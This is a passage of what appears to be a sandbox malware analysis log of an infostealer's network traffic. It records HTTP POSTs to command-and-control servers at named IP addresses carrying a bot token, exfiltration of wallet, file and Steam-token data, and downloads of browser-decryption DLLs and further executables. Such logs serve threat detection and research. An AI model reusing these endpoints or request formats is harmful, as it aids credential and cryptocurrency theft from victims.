name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="file"------FHCGHJDBFIIDGDHIJDBG--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file"------ECGDBAEHIJKKFHIEGCBG--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/freebl3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/mozglue.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/msvcp140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 33 38 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000238002&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/nss3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3840509/build.exe?hash=AgADNB HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/softokn3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/vcruntime140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000241001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFBHost: 91.202.233.158Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /inc/runtime.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: 91.202.233.158Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="message"wallets------CBKFIECBGDHJKECAKFBG--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHIHost: 91.202.233.158Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="message"files------KKJKFBKKECFHJKEBKEHI--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 2d 2d 0d 0a Data Ascii: ------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="file"------EGDGDHJJDGHCAAAKEHIJ--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000243001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFIEHCFIECBGCBFHIJJHost: 91.202.233.158Content-Length: 119359Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ProlongedPortable.dll HTTP/1.1Host: 185.215.113.19Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDBHost: 91.202.233.158Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 2d 2d 0d 0a Data Ascii: ------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="message"ybncbhylepme------IDHIDBAEGIIIDHJKEGDB--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 91.202.233.158Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 63 63 65 65 35 31 62 37 32 63 34 34 33 33 35 37 61 34 36 65 30 66 31 63 66 37 36 35 36 35 30 31 33 38 39 65 38 39 66 66 32 65 35 66 61 63 37 38 62 35 34 37 63 34 38 33 31 62 36 66 36 38 37 64 36 64 64 35 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"fccee51b72c443357a46e0f1cf7656501389e89ff2e5fac78b547c4831b6f687d6dd5c2a------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JKECFCFBGDHIECAAFIID--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTI2NDg2Host: 185.215.113.19Content-Length: 126638Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
